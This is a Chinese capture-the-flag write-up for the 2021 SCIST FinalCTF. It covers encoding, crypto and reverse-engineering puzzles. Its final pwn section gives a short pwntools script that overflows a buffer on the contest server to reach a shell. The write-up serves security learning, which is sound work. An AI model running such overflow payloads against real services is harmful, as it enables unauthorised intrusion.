2021 SCIST FinalCTF write-up

SCIST

Publish Date: 2021-07-22

Word Count: 3k

Read Times: 17 Min

Read Count:

作者: Gunjyo

Information

第一屆 SCIST 資安課程季後賽

ID	gunjyo
Date	2021/07/20 10:00 - 2021/7/22 10:00
Rank(Official)	1
Rank(All)	5
Score	3002
FirstBlood	1
Solves	8/14

Scoreboard

Solves

Misc (3/3)

QQCode(100)

Author: MuMu

修 QRCode
使用工具：CrazyBox

修復後

flag:SCIST{0mg_cAn_U_sT0p_D35Tr0y1Ng_mY_qrC0de?}

Weird Email(304)

Oops, this email has been modified,
But secret still there,
Can you find it?
Author: nella17

給了一份.eml檔案

用郵件打開後長這樣

用 VScode 打開

MIME-Version: 1.0
Date: Wed, 21 Jul 2021 09:55:00 +0800
Message-ID: <CAFrE2-zGa+RL7QLCM6-g8roXCRb=_Y4vEwri3VLcqSNrL4yKvA@mail.gmail.com>
Subject: The Final Countdown Lyrics
From: "SCIST, Official" <no_reply@scist.org>
To: Official SCIST <no_reply@scist.org>
Content-Type: multipart/alternative; boundary="000000000000cc444505c77bad41"

--000000000000cc444505c77bad41
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable

The Final Countdown
Europe - Live At Sweden Rock 30th Anniversary Show
Ohh ho ohh
The final countdown, oh ho
It's the final countdown
The final countdown
The final countdown
(The final countdown)
Ohh
It's the final countdown
We're leaving together
The final countdown
We'll all miss her so
It's the final countdown
(The final countdown)
Ohh, it's the final countdown
Yea.
Source: MetroLyrics
SCIST{=E2=84=B31=E2=93=82=E2=93=94_4=E2=84=95=E1=B5=88_=E2=84=9A-=E2=92=BA=
=E1=B4=BA=E2=84=AD0d=E2=84=B9=EF=B8=8F=EF=BD=8E9_a=E2=93=A1e_c=E2=93=9E0=E2=
=84=93}
=E5=AD=A3=E5=BE=8C=E8=B3=BD

--000000000000cc444505c77bad41
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable

<div dir=3D"ltr"><div style=3D"color:white"><div style=3D"margin:0px;paddin=
g:0px;border:0px;font-family:DDG_ProximaNova,DDG_ProximaNova_UI_0,DDG_Proxi=
maNova_UI_1,DDG_ProximaNova_UI_2,DDG_ProximaNova_UI_3,DDG_ProximaNova_UI_4,=
DDG_ProximaNova_UI_5,DDG_ProximaNova_UI_6,&quot;Proxima Nova&quot;,&quot;He=
lvetica Neue&quot;,Helvetica,&quot;Segoe UI&quot;,&quot;Nimbus Sans L&quot;=
,&quot;Liberation Sans&quot;,&quot;Open Sans&quot;,FreeSans,Arial,sans-seri=
f;font-weight:600;font-stretch:inherit;line-height:1em;font-size:1.67em;ver=
tical-align:baseline;word-wrap:break-word;color:black;opacity:1"><span styl=
e=3D"font-family:inherit;font-size:24.047998428344727px;font-style:inherit;=
font-variant-caps:inherit;font-weight:inherit">The Final Countdown</span><b=
r></div><span style=3D"margin:0px;padding:0px;border:0px;font-family:DDG_Pr=
oximaNova,DDG_ProximaNova_UI_0,DDG_ProximaNova_UI_1,DDG_ProximaNova_UI_2,DD=
G_ProximaNova_UI_3,DDG_ProximaNova_UI_4,DDG_ProximaNova_UI_5,DDG_ProximaNov=
a_UI_6,&quot;Proxima Nova&quot;,&quot;Helvetica Neue&quot;,Helvetica,&quot;=
Segoe UI&quot;,&quot;Nimbus Sans L&quot;,&quot;Liberation Sans&quot;,&quot;=
Open Sans&quot;,FreeSans,Arial,sans-serif;font-stretch:inherit;line-height:=
1.84em;font-size:0.92em;vertical-align:baseline;color:rgb(102,102,102);disp=
lay:block;text-transform:capitalize;opacity:1">Europe - Live At Sweden Rock=
 30th Anniversary Show</span><div style=3D"margin:0px;padding:10px 0px 0px;=
border:0px;font-family:DDG_ProximaNova,DDG_ProximaNova_UI_0,DDG_ProximaNova=
_UI_1,DDG_ProximaNova_UI_2,DDG_ProximaNova_UI_3,DDG_ProximaNova_UI_4,DDG_Pr=
oximaNova_UI_5,DDG_ProximaNova_UI_6,&quot;Proxima Nova&quot;,&quot;Helvetic=
a Neue&quot;,Helvetica,&quot;Segoe UI&quot;,&quot;Nimbus Sans L&quot;,&quot=
;Liberation Sans&quot;,&quot;Open Sans&quot;,FreeSans,Arial,sans-serif;font=
-stretch:inherit;line-height:1.45em;font-size:14.399999618530273px;vertical=
-align:baseline;word-wrap:break-word;color:black;opacity:1"><span style=3D"=
margin:0px;padding:0px;border:0px;font-family:inherit;font-style:inherit;fo=
nt-variant-caps:inherit;font-stretch:inherit;line-height:inherit;vertical-a=
lign:baseline">Ohh ho ohh<span>=C2=A0</span><br>The<span>=C2=A0</span><span=
 style=3D"margin:0px;padding:0px;border:0px;font-family:inherit;font-style:=
inherit;font-variant-caps:inherit;font-weight:600;font-stretch:inherit;line=
-height:inherit;vertical-align:baseline">final</span><span>=C2=A0</span><sp=
an style=3D"margin:0px;padding:0px;border:0px;font-family:inherit;font-styl=
e:inherit;font-variant-caps:inherit;font-weight:600;font-stretch:inherit;li=
ne-height:inherit;vertical-align:baseline">countdown</span>, oh ho<span>=C2=
=A0</span><br>It&#39;s the<span>=C2=A0</span><span style=3D"margin:0px;padd=
ing:0px;border:0px;font-family:inherit;font-style:inherit;font-variant-caps=
:inherit;font-weight:600;font-stretch:inherit;line-height:inherit;vertical-=
align:baseline">final</span><span>=C2=A0</span><span style=3D"margin:0px;pa=
dding:0px;border:0px;font-family:inherit;font-style:inherit;font-variant-ca=
ps:inherit;font-weight:600;font-stretch:inherit;line-height:inherit;vertica=
l-align:baseline">countdown</span><span>=C2=A0</span><br>The<span>=C2=A0</s=
pan><span style=3D"margin:0px;padding:0px;border:0px;font-family:inherit;fo=
nt-style:inherit;font-variant-caps:inherit;font-weight:600;font-stretch:inh=
erit;line-height:inherit;vertical-align:baseline">final</span><span>=C2=A0<=
/span><span style=3D"margin:0px;padding:0px;border:0px;font-family:inherit;=
font-style:inherit;font-variant-caps:inherit;font-weight:600;font-stretch:i=
nherit;line-height:inherit;vertical-align:baseline">countdown</span><span>=
=C2=A0</span><br>The<span>=C2=A0</span><span style=3D"margin:0px;padding:0p=
x;border:0px;font-family:inherit;font-style:inherit;font-variant-caps:inher=
it;font-weight:600;font-stretch:inherit;line-height:inherit;vertical-align:=
baseline">final</span><span>=C2=A0</span><span style=3D"margin:0px;padding:=
0px;border:0px;font-family:inherit;font-style:inherit;font-variant-caps:inh=
erit;font-weight:600;font-stretch:inherit;line-height:inherit;vertical-alig=
n:baseline">countdown</span><span>=C2=A0</span><br>(The<span>=C2=A0</span><=
span style=3D"margin:0px;padding:0px;border:0px;font-family:inherit;font-st=
yle:inherit;font-variant-caps:inherit;font-weight:600;font-stretch:inherit;=
line-height:inherit;vertical-align:baseline">final</span><span>=C2=A0</span=
><span style=3D"margin:0px;padding:0px;border:0px;font-family:inherit;font-=
style:inherit;font-variant-caps:inherit;font-weight:600;font-stretch:inheri=
t;line-height:inherit;vertical-align:baseline">countdown</span>)<span>=C2=
=A0</span></span></div><div style=3D"margin:0px;padding:10px 0px 0px;border=
:0px;font-family:DDG_ProximaNova,DDG_ProximaNova_UI_0,DDG_ProximaNova_UI_1,=
DDG_ProximaNova_UI_2,DDG_ProximaNova_UI_3,DDG_ProximaNova_UI_4,DDG_ProximaN=
ova_UI_5,DDG_ProximaNova_UI_6,&quot;Proxima Nova&quot;,&quot;Helvetica Neue=
&quot;,Helvetica,&quot;Segoe UI&quot;,&quot;Nimbus Sans L&quot;,&quot;Liber=
ation Sans&quot;,&quot;Open Sans&quot;,FreeSans,Arial,sans-serif;font-stret=
ch:inherit;line-height:1.45em;font-size:14.399999618530273px;vertical-align=
:baseline;word-wrap:break-word;color:black;opacity:1"><span style=3D"margin=
:0px;padding:0px;border:0px;font-family:inherit;font-style:inherit;font-var=
iant-caps:inherit;font-stretch:inherit;line-height:inherit;vertical-align:b=
aseline">Ohh<span>=C2=A0</span><br>It&#39;s the<span>=C2=A0</span><span sty=
le=3D"margin:0px;padding:0px;border:0px;font-family:inherit;font-style:inhe=
rit;font-variant-caps:inherit;font-weight:600;font-stretch:inherit;line-hei=
ght:inherit;vertical-align:baseline">final</span><span>=C2=A0</span><span s=
tyle=3D"margin:0px;padding:0px;border:0px;font-family:inherit;font-style:in=
herit;font-variant-caps:inherit;font-weight:600;font-stretch:inherit;line-h=
eight:inherit;vertical-align:baseline">countdown</span><span>=C2=A0</span><=
br>We&#39;re leaving together<span>=C2=A0</span><br>The<span>=C2=A0</span><=
span style=3D"margin:0px;padding:0px;border:0px;font-family:inherit;font-st=
yle:inherit;font-variant-caps:inherit;font-weight:600;font-stretch:inherit;=
line-height:inherit;vertical-align:baseline">final</span><span>=C2=A0</span=
><span style=3D"margin:0px;padding:0px;border:0px;font-family:inherit;font-=
style:inherit;font-variant-caps:inherit;font-weight:600;font-stretch:inheri=
t;line-height:inherit;vertical-align:baseline">countdown</span><span>=C2=A0=
</span><br>We&#39;ll all miss her so<span>=C2=A0</span><br>It&#39;s the<spa=
n>=C2=A0</span><span style=3D"margin:0px;padding:0px;border:0px;font-family=
:inherit;font-style:inherit;font-variant-caps:inherit;font-weight:600;font-=
stretch:inherit;line-height:inherit;vertical-align:baseline">final</span><s=
pan>=C2=A0</span><span style=3D"margin:0px;padding:0px;border:0px;font-fami=
ly:inherit;font-style:inherit;font-variant-caps:inherit;font-weight:600;fon=
t-stretch:inherit;line-height:inherit;vertical-align:baseline">countdown</s=
pan><span>=C2=A0</span><br>(The<span>=C2=A0</span><span style=3D"margin:0px=
;padding:0px;border:0px;font-family:inherit;font-style:inherit;font-variant=
-caps:inherit;font-weight:600;font-stretch:inherit;line-height:inherit;vert=
ical-align:baseline">final</span><span>=C2=A0</span><span style=3D"margin:0=
px;padding:0px;border:0px;font-family:inherit;font-style:inherit;font-varia=
nt-caps:inherit;font-weight:600;font-stretch:inherit;line-height:inherit;ve=
rtical-align:baseline">countdown</span>)<span>=C2=A0</span><br>Ohh, it&#39;=
s the<span>=C2=A0</span><span style=3D"margin:0px;padding:0px;border:0px;fo=
nt-family:inherit;font-style:inherit;font-variant-caps:inherit;font-weight:=
600;font-stretch:inherit;line-height:inherit;vertical-align:baseline">final=
</span><span>=C2=A0</span><span style=3D"margin:0px;padding:0px;border:0px;=
font-family:inherit;font-style:inherit;font-variant-caps:inherit;font-weigh=
t:600;font-stretch:inherit;line-height:inherit;vertical-align:baseline">cou=
ntdown</span><span>=C2=A0</span><br>Yea.</span><div style=3D"margin:15px 0p=
x 0px;padding:0px;border:0px;font-family:inherit;font-style:inherit;font-va=
riant-caps:inherit;font-stretch:inherit;line-height:inherit;vertical-align:=
baseline;color:rgb(136,136,136)">Source: MetroLyrics</div></div></div>

--000000000000cc444505c77bad41--

其中看到了 flag format

SCIST{=E2=84=B31=E2=93=82=E2=93=94_4=E2=84=95=E1=B5=88_=E2=84=9A-=E2=92=BA=
=E1=B4=BA=E2=84=AD0d=E2=84=B9=EF=B8=8F=EF=BD=8E9_a=E2=93=A1e_c=E2=93=9E0=E2=
=84=93}
=E5=AD=A3=E5=BE=8C=E8=B3=BD

把上面這串丟進下面的 html 裡面再用郵件打開可以看到這串

SCIST{ℳ1Ⓜⓔ_4ℕᵈ_ℚ-Ⓔᴺℭ0dℹ️ｎ9_aⓡe_cⓞ0ℓ} 季後賽

然後 Hint 說FLAG match regex ^SCIST{[^_=}]+}$

所以拿到 regex101 測，把_都拔掉，但是答案不正確

此時想到另外一個Hint是 FLAG contains some space, you shouldn’t remove it.

所以就把_改成 space 就過了

flag:SCIST{ℳ1Ⓜⓔ 4ℕᵈ ℚ-Ⓔᴺℭ0dℹ️ｎ9 aⓡe cⓞ0ℓ}

Base69(451)

Maybe something good this way.
Oh here’s a Base69, maybe I can use this to charging shell.
Author: MuMu
Hint：It’s not like Base64 or Base32 , maybe you can try other Bases’ Serial Alogrithm.

有給 alpha 和enc

就是要照某個 Base 加密的方法去解密

Hint 說不是 Base64 32

於是嘗試了許多種 Base 加密

最後得出了 Base58

參考網址 base全家桶

script

alpha = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!?_{}><'
enc = '2hk>t?GBbU_ijB1Xa>pQK69_e1e2n>FCoPL9Zd??x9_y68fvF'

tbl=[]
for i in enc:
    for j in range(len(alpha)):
        if(i==alpha[j]):
            tbl.append(j)
#tbl [2, 17, 20, 67, 29, 63, 42, 37, 11, 56, 64, 18, 19, 37, 1, 59, 10, 67, 25, 52, 46, 6, 9, 64, 14, 1, 14, 2, 23, 67, 41, 38, 24, 51, 47, 9, 61, 13, 63, 63, 33, 9, 64, 34, 6, 8, 15, 31, 41]

n=48
sum=0
for i in tbl:
    sum+=i*pow(69,n)
    n-=1
#sum 41408543872100313264991885783357661336445924157488989323449377550872931073194048919845245

f=''
while(sum):
    f+=chr(sum%256)
    sum//=256
print(f[::-1])

flag:SCIST{BasE58???_WhY_n07_us1ng_Base69}

Crypto(2/3)

CarryMe(379)

Where the hell is source code ??
Author: MuMu

21010011 32111 41021 5313 6220 7234 8163 953 a109 b47 c70 d3a e7b f49 g35 h5a i62 j2a k4f l4f m24 n48 o23 p3k q1n r47 s3b t3a u3k v1h w3p x1g y38 z3k

每一個字前面代表是幾進位制

換成 dec 之後轉 chr 就有了

使用工具：進制轉換

ECBytes(419)

There’s no description :) , just solve that.
Author: MuMu

給了alpha、output、task.py

task.py

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from os import urandom
from secret import flag
from string import printable

key = urandom(16)
aes = AES.new(key , mode=AES.MODE_ECB)
alpha = printable

with open("alpha" , "wb") as f:
    for i in alpha:
        tmp = aes.encrypt(pad(i.encode() , 16))
        f.write(tmp)

with open("output" , "wb") as f:
    for i in flag:
        tmp = aes.encrypt(pad(i.encode() , 16))
        f.write(tmp)

alpha、output 打開是一堆亂碼

因為是分別把每個字都拿去 ECB

所以只要把 output 去比對 alpha 就可以了

Reverse(2/3)

Flag Checker | One-Line Edition(379)

Good, old flag checker… But in one line…
Author: CSY54

task.py

(lambda a: (lambda b: (lambda c, d: (lambda e: (lambda f: (lambda g: print('Congratulations!' if g else 'Not quite!'))(f == [251, 256, 300, 242, 263, 256, 328, 335, 269, 252, 263, 203, 291, 190, 220, 245, 277, 200, 214, 254]))([sum(_) for _ in e]))(map(lambda z: [c[y] for y in z], d)))([_ ^ 10 - 3 for _ in b], [[9, 10, 23], [23, 22, 20], [14, 20, 4], [13, 12, 20], [8, 7, 20], [0, 3, 17], [9, 16, 24], [24, 8, 6], [18, 14, 11], [22, 15, 21], [2, 21, 0], [11, 9, 19], [5, 4, 3], [17, 11, 7], [19, 1, 21], [4, 11, 14], [12, 4, 20], [23, 21, 13], [3, 2, 15], [4, 12, 4]]))(map(ord, a)))(input('What\'s the flag?\n> '))

[9, 10, 23], [23, 22, 20], [14, 20, 4], [13, 12, 20], [8, 7, 20], [0, 3, 17], [9, 16, 24], [24, 8, 6], [18, 14, 11], [22, 15, 21], [2, 21, 0], [11, 9, 19], [5, 4, 3], [17, 11, 7], [19, 1, 21], [4, 11, 14], [12, 4, 20], [23, 21, 13], [3, 2, 15], [4, 12, 4]

這串的當作 flag 的 index^7 ,三個一組加起來會得到下面這個陣列
Ex.ord(flag[9])+ord(flag[10])+ord(flag[23])=251

[251, 256, 300, 242, 263, 256, 328, 335, 269, 252, 263, 203, 291, 190, 220, 245, 277, 200, 214, 254]

因為知道 flag 的第 0,1,2,3,4,5,24 個值(SCIST{})

所以每一個都可以推出來

flag=[84,68,78,84,83,124,107,51,106,101,99,51,88,48,111,52,105,88,107,51,106,101,99,51,122]
for i in flag:
    print(chr(i^7),end='')

flag:SCIST{l4mbd4_7h3n_l4mbd4}

Flag Checker ^ Online(379)

Good, old flag checker… But online…
http://chall.ctf.scist.org:10201
Author: CSY54

把 js 檔案美化之後可以看到裡面有一個 function

function i(e) {
            const t = [166, 32, 178, 20, 188, 74, 42, 238, 34, 200, 162, 100, 12, 98, 4, 186, 210, 14, 198, 120, 24, 156, 16, 186, 208, 86, 62, 80, 54, 204];
            return e.length === t.length && e === t.map(e => e / 2).reduce((e, t, n, r) => n ? [...e, t ^ r[n - 1]] : [t], []).map(e => String.fromCharCode(e)).join("")
        }

script

t = [166, 32, 178, 20, 188, 74, 42, 238, 34, 200, 162, 100, 12, 98, 4, 186, 210, 14, 198, 120, 24, 156, 16, 186, 208, 86, 62, 80, 54, 204]
for i in range(len(t)-1):
    print(chr((t[i]^t[i+1])//2),end='')

flag:SCIST{0bfu5c473_4nd_0BFU5C473}

PWN(1/2)

Buffer Crasher(491)

chall.ctf.scist.org:10101
Author: TwinkleStar03 & nella17]

overflow 的裸題
用 IDA 開起來
)
去找到/bin/sh的 address
)

script

from pwn import *
r = remote('chall.ctf.scist.org',10101)
#r = process('./buffer-crasher')

r.recvline()
r.sendline(b'A'*840+p64(0x040119E))

r.interactive()